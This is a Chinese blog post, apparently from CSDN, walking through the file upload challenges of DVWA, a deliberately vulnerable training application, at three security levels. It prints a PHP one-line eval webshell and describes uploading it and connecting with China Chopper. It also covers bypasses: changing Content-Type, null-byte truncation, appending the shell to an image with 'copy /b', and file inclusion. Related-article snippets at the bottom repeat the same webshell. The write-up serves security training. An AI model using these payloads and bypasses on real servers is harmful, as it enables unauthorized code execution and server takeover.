dvwa中的文件上传模块解析

最新推荐文章于 2024-04-07 20:16:29 发布
最新推荐文章于 2024-04-07 20:16:29 发布
阅读量292 收藏
点赞数
分类专栏: dvwa 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51822230/article/details/115404444
版权

文件上传原理

原理:文件上传就是对服务端上传文件,因服务端对文件类型过滤不严格导致恶意文件被解析,导致服务端的权限泄露。

文件上传的条件:
1.可以上传文件
2.上传的文件可以被服务器解析
3.可以找到上传文件的路径

dvwa练习

LOW

我们先看看low级别的代码
在这里插入图片描述1.首先使用isset()函数进行变量测试们是否点击了upload
2.然后进行一个变量上传路径的定义。用.=进行连续变量定义。
3.对文件是否上传到临时目录进行判断

从源代码我们可以看出并没有对上传文件进行任何过滤

我们直接上传一个一句话<?php @eval($_POST['1']); ?>
在这里插入图片描述然后是使用中国菜刀进行连接

在这里插入图片描述在这里插入图片描述
连接成功

MEDIUM
在这里插入图片描述我们试着上传一下,可以看出对我们上传文件的类型进行了一个规定

来看一看源码
在这里插入图片描述1.basename规定了上传路径和拓展名
2.进行变量的赋值,然后进行过滤
3.根据上传文件是否匹对,返回结果
4.没有对拓展名进行过滤

在这里插入图片描述Content-Type: application/octet-stream改为image/jpeg
上传成功。使用菜刀解析php文件。

方法二
在php版本小于5.3.4时可以利用00截断
1.我们更改文件名,‘1.phpX.jpeg’ X可以为任意符号,然后我们查找一下他的十六进制数,再到拦截包里的hex数组中找到进制数,用00进行替换,我们就可以看到文件名的jpeg被截断。
2.直接对文件名进行截断‘1.php%00.jpeg’,brup截断后再convert用url编码进行解码。

HIGH
在这里插入图片描述从源代码我们可以看出uploaded_ext被赋值,文件拓展名被进行过滤。

getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。
语法格式:
array getimagesize ( string KaTeX parse error: Expected 'EOF', got '&' at position 19: …ename [, array &̲imageinfo ] )

getimagesize() 函数会判定文件内容是不是图片,所以我们再更改拓展名后还需要再php文件里加入图片的头部。

getimagesize() 函数绕过
使用cpoy命令把一句话写入图片底部。
copy /b 1.jpg+1.php
在这里插入图片描述
也可以再我们的php文件加入jpg或者png头部。也可以绕过。

最后利用文件包含进行php格式的运行。

在这里插入图片描述菜刀连接
在菜刀里进行登录,拿到cookie。
再去菜刀的文件管理就可以拿到webshell了。
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210404095621385.png?x-oss-process=imagtnt e/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L20wXzUxODIyMjMw,size_16,color_FFFFFF,t_70)

总结一下我们绕过类型
1.黑名单的拓展名绕过(穷举法,brup)
2.content-type绕过
3.js验证绕过(一般抓不到网络包的,都是前端过滤)
①可以直接在网页源代码中去除js过滤,或者把源码拷贝出来,写入html文件,加入action绑定源网址。
②可以抓包,修改后缀名或者在jpg内容中添加php一句话。
4.头部验证绕过
5.iis6的文件夹解析漏洞和文件名漏洞
6.00截断
7.系统特性
①上传文件1.php:.jpg的时候,会在目录下声称空白文件,我们在进行一个文件输入。filename.<<<

hsxiaowu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA文件上传(File Upload)
qq_39682037的博客
03-21 2600
文件上传(File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
DVWA-File Upload(文件上传)
简简的博客
02-02 473
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA文件上传
qq_62078839的博客
04-03 3597
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA-文件上传
Xiayuyuren_Study的博客
06-05 6020
概述 文件上传漏洞是指服务器对于用户上传的部分控制不严格导致攻击者可上传一个恶意的可执行文件至服务器,简单点就是用户直接或通过各种绕过方式将webshell上传至服务器进而执行利用 攻击原理: 1.web容器的解析漏洞 2.配合解析漏洞进行waf绕过和上传木马。 Apache的文件解析漏洞,比如现在我们有一个1.php.rar.xx.kk的文件,那么服务器会报错吗?答案是否定的,Apache有自己...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。...帮助web开发人员理解web应用保护的过程,还可以在课堂为... DVWA现在已包含在流行的渗透测试Linux发行版,例如Samurai的Web测试框架等。
DVWA(Damn Vulnerable Web Application)DVWA资源文件
08-06
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。...
DVWA的压缩文件安装包下载
09-30
1. **SQL注入**:DVWA的"SQL Injection"模块让你体验如何通过构造恶意SQL语句来获取或篡改数据库信息。了解如何防止SQL注入对于任何Web开发者来说都是基础。 2. **跨站脚本攻击(XSS)**:DVWA包含"Cross Site ...
PHPDVWA文件
07-28
首先,你需要在`phpstudy_x64_8.1.1.3` 配置好DVWA所需的环境,比如设置Apache或Nginx服务器,导入MySQL数据库。然后,将DVWA的源代码解压到服务器的根目录下,确保Web服务器能够访问。启动服务后,你就可以通过...
dvwa安装包文件资源
12-21
dvwa安装包文件资源
DVWA(文件上传)
weixin_44023403的博客
12-06 339
DVWA文件上传文件上传(File Upload)LowMedium 文件上传(File Upload) 文件上传介绍: 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 文件上传漏洞的利用的条件: 1.能够成功上传木马文件; 2.上传文件必须能够被执行; 3.上传文件的路径必须可知. Low 源码: <?php if( isset( $_POST[ 'Upload'
DVWA-文件上传(File Upload)
weixin_58954236的博客
08-20 797
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA---文件上传
孤的博客
11-20 410
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
DVWA——文件上传
m0_74426634的博客
04-07 1048
大部分的网站和应用系统都有上传功能,一些文件上传功能实现代码没有严格限制用户上传文件后缀以及文件类型,导致允许攻击者向某个可通过Web访问的目录上传任意PHP文件,并能够将这些文件传递给PHP解释器,就可以在远程服务器上执行任意PHP脚本。当系统存在文件上传漏洞时攻击者可以将病毒、木马、WebShell、其他恶意脚本或者是包含了脚本的图片上传到服务器,这些文件将对攻击者后续攻击提供便利。根据具体漏洞的差异,此处上传的脚本可以是正常后缀的PHP、ASP以及JSP脚本,也可以是篡改后缀后的这几类脚本。
DVWA 之 File Upload(文件上传
RexHa的博客
10-02 2707
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA--file upload (文件上传
weixin_50342860的博客
08-23 1369
目录风险lowmediumhigh总结 风险 对上传文件类型,内容没有进行严格的过滤、检查,使攻击者可以上传木马获取服务器webshell权限。 low 查看代码,对上传文件没有做任何的过滤措施 basename(path,suffix)函数:点这里 全局数组 $_FILES: 点这里 move_uploaded_file() 函数:点这里 1. 写一句话木马1.php上传 <?php @eval($_POST['hello']); ?> 2. 上传成功,给出了上传文件路径,访问获
DVWA系列——File Upload(文件上传
weixin_49340699的博客
12-12 1097
DVWA系列——File Upload(文件上传)简介low级别源码分析上传木马打开国菜刀进行连接medium源码分析破解思路high源码分析破解思路方法一方法二impossible 简介 File Upload文件上传漏洞,通常是由于对上传文件的类型内容没有进行严格的过滤检查使得可以上传webshell获取服务器权限,所以文件上传漏洞带来的危害也是毁灭性的。 low级别 源码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are
DVWA篇_文件上传
求大佬师傅带
05-25 1463
记一次DVWA文件上传漏洞复现
DVWA-File Upload(High)
七月_的博客
10-23 1184
文章目录File Upload(High)代码分析 File Upload(High) 代码分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $...
dvwa文件上传漏洞防御
最新发布
07-13
DVWA(Damn Vulnerable Web Application)是一个开源的安全教育工具,用于演示常见的Web应用程序安全漏洞。其文件上传漏洞防御通常涉及以下几个方面: 1. **验证用户输入**:服务器需要检查上传文件的类型、大小、名称等是否符合预设规则,防止恶意文件上传PHP脚本、SQL注入文件等。 2. **限制上传路径**:限制用户只能上传到特定的目录下,避免文件直接写入系统敏感目录,比如web根目录。 3. **禁止执行权限**:上传文件应当保存为只读模式,防止服务器执行这些文件,尤其是.php或.cgi类型的文件。 4. **使用文件类型检测库**:有些框架内置了对文件类型的检测机制,可以有效阻止恶意文件上传。 5. **使用安全套接字层(SSL)**:对于包含敏感数据的文件上传,使用HTTPS加密传输能增加安全性。 6. **错误处理和日志记录**:在处理文件上传失败的情况时,要有恰当的错误提示,并记录日志以便审计。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值